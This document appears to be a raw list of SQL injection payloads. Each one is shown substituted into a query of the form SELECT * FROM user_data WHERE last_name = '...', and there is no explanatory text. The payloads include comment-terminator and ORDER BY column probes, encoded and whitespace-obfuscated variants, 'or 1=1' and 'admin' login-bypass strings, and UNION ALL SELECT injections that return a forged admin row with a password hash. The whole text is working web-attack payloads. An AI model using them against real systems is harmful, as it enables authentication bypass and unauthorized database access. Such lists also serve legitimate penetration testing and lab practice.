SELECT * FROM user_data WHERE last_name = '1' order by 1)--  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1))--  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1;%00  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1));%00  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1;%60  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1%23  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1%60  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1%90  ;
SELECT * FROM user_data WHERE last_name = '1'%23/* order by 1  ;
SELECT * FROM user_data WHERE last_name = '1') order by 1  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1") ;%00  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1#--+  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1'))%23  ;
SELECT * FROM user_data WHERE last_name = '1' order by 1-- -  ;
SELECT * FROM user_data WHERE last_name = '1'/**/order/**/by/**/1--/**/-  ;
SELECT * FROM user_data WHERE last_name = '1'%23nuLL%0Aorder%23nuLL%0Aby%23nuLL%0A1--%23nuLL%0A-  ;
SELECT * FROM user_data WHERE last_name = ''-' ;
SELECT * FROM user_data WHERE last_name = '' ' ;
SELECT * FROM user_data WHERE last_name = ''&' ;
SELECT * FROM user_data WHERE last_name = ''^' ;
SELECT * FROM user_data WHERE last_name = ''*' ;
SELECT * FROM user_data WHERE last_name = '' or ''-' ;
SELECT * FROM user_data WHERE last_name = '' or '' ' ;
SELECT * FROM user_data WHERE last_name = '' or ''&' ;
SELECT * FROM user_data WHERE last_name = '' or ''^' ;
SELECT * FROM user_data WHERE last_name = '' or ''*' ;
SELECT * FROM user_data WHERE last_name = '"-" ;
SELECT * FROM user_data WHERE last_name = '" " ;
SELECT * FROM user_data WHERE last_name = '"&" ;
SELECT * FROM user_data WHERE last_name = '"^" ;
SELECT * FROM user_data WHERE last_name = '"*" ;
SELECT * FROM user_data WHERE last_name = '" or ""-" ;
SELECT * FROM user_data WHERE last_name = '" or "" " ;
SELECT * FROM user_data WHERE last_name = '" or ""&" ;
SELECT * FROM user_data WHERE last_name = '" or ""^" ;
SELECT * FROM user_data WHERE last_name = '" or ""*" ;
SELECT * FROM user_data WHERE last_name = 'or true-- ;
SELECT * FROM user_data WHERE last_name = '" or true-- ;
SELECT * FROM user_data WHERE last_name = '' or true-- ;
SELECT * FROM user_data WHERE last_name = '") or true-- ;
SELECT * FROM user_data WHERE last_name = '') or true-- ;
SELECT * FROM user_data WHERE last_name = '' or 'x'='x ;
SELECT * FROM user_data WHERE last_name = '') or ('x')=('x ;
SELECT * FROM user_data WHERE last_name = '')) or (('x'))=(('x ;
SELECT * FROM user_data WHERE last_name = '" or "x"="x ;
SELECT * FROM user_data WHERE last_name = '") or ("x")=("x ;
SELECT * FROM user_data WHERE last_name = '")) or (("x"))=(("x ;
SELECT * FROM user_data WHERE last_name = 'or 1=1 ;
SELECT * FROM user_data WHERE last_name = 'or 1=1-- ;
SELECT * FROM user_data WHERE last_name = 'or 1=1# ;
SELECT * FROM user_data WHERE last_name = 'or 1=1/* ;
SELECT * FROM user_data WHERE last_name = 'admin' -- ;
SELECT * FROM user_data WHERE last_name = 'admin' # ;
SELECT * FROM user_data WHERE last_name = 'admin'/* ;
SELECT * FROM user_data WHERE last_name = 'admin' or '1'='1 ;
SELECT * FROM user_data WHERE last_name = 'admin' or '1'='1'-- ;
SELECT * FROM user_data WHERE last_name = 'admin' or '1'='1'# ;
SELECT * FROM user_data WHERE last_name = 'admin' or '1'='1'/* ;
SELECT * FROM user_data WHERE last_name = 'admin'or 1=1 or ''=' ;
SELECT * FROM user_data WHERE last_name = 'admin' or 1=1 ;
SELECT * FROM user_data WHERE last_name = 'admin' or 1=1-- ;
SELECT * FROM user_data WHERE last_name = 'admin' or 1=1# ;
SELECT * FROM user_data WHERE last_name = 'admin' or 1=1/* ;
SELECT * FROM user_data WHERE last_name = 'admin') or ('1'='1 ;
SELECT * FROM user_data WHERE last_name = 'admin') or ('1'='1'-- ;
SELECT * FROM user_data WHERE last_name = 'admin') or ('1'='1'# ;
SELECT * FROM user_data WHERE last_name = 'admin') or ('1'='1'/* ;
SELECT * FROM user_data WHERE last_name = 'admin') or '1'='1 ;
SELECT * FROM user_data WHERE last_name = 'admin') or '1'='1'-- ;
SELECT * FROM user_data WHERE last_name = 'admin') or '1'='1'# ;
SELECT * FROM user_data WHERE last_name = 'admin') or '1'='1'/* ;
SELECT * FROM user_data WHERE last_name = '1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 ;
SELECT * FROM user_data WHERE last_name = 'admin" -- ;
SELECT * FROM user_data WHERE last_name = 'admin" # ;
SELECT * FROM user_data WHERE last_name = 'admin"/* ;
SELECT * FROM user_data WHERE last_name = 'admin" or "1"="1 ;
SELECT * FROM user_data WHERE last_name = 'admin" or "1"="1"-- ;
SELECT * FROM user_data WHERE last_name = 'admin" or "1"="1"# ;
SELECT * FROM user_data WHERE last_name = 'admin" or "1"="1"/* ;
SELECT * FROM user_data WHERE last_name = 'admin"or 1=1 or ""=" ;
SELECT * FROM user_data WHERE last_name = 'admin" or 1=1 ;
SELECT * FROM user_data WHERE last_name = 'admin" or 1=1-- ;
SELECT * FROM user_data WHERE last_name = 'admin" or 1=1# ;
SELECT * FROM user_data WHERE last_name = 'admin" or 1=1/* ;
SELECT * FROM user_data WHERE last_name = 'admin") or ("1"="1 ;
SELECT * FROM user_data WHERE last_name = 'admin") or ("1"="1"-- ;
SELECT * FROM user_data WHERE last_name = 'admin") or ("1"="1"# ;
SELECT * FROM user_data WHERE last_name = 'admin") or ("1"="1"/* ;
SELECT * FROM user_data WHERE last_name = 'admin") or "1"="1 ;
SELECT * FROM user_data WHERE last_name = 'admin") or "1"="1"-- ;
SELECT * FROM user_data WHERE last_name = 'admin") or "1"="1"# ;
SELECT * FROM user_data WHERE last_name = 'admin") or "1"="1"/* ;
SELECT * FROM user_data WHERE last_name = '1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ;